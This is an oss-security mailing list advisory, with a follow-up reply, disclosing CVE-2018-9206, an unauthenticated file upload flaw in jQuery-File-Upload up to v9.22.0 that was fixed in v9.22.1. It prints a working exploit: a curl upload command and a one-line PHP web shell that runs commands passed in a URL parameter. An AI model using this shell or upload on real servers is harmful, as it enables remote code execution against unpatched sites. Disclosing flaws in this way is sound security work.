Discussion:
[oss-security] jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Larry W. Cashdollar
2018-10-11 16:06:21 UTC
Permalink
Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID:[CVE-2018-9206]
Download Site: https://github.com/blueimp/jQuery-File-Upload/
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=204
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
Vulnerability:
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.


Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
Screen Shots:
Notes: Actively being exploited in the wild. https://github.com/blueimp/jQuery-File-Upload/pull/3514
Larry W. Cashdollar
2018-10-14 02:11:41 UTC
Permalink
Hello All,



This has been fixed in v9.22.1.



Larry

From: "Larry W. Cashdollar" <***@me.com>
Reply-To: Open Security <oss-***@lists.openwall.com>
Date: Thursday, October 11, 2018 at 12:07 PM
To: Open Security <oss-***@lists.openwall.com>
Subject: [oss-security] jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability



Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID:[CVE-2018-9206]
Download Site: https://github.com/blueimp/jQuery-File-Upload/
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=204
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
Vulnerability:
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.


Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php

$cmd=$_GET['cmd'];

system($cmd);

?>
Screen Shots:
Notes: Actively being exploited in the wild. https://github.com/blueimp/jQuery-File-Upload/pull/3514
Loading...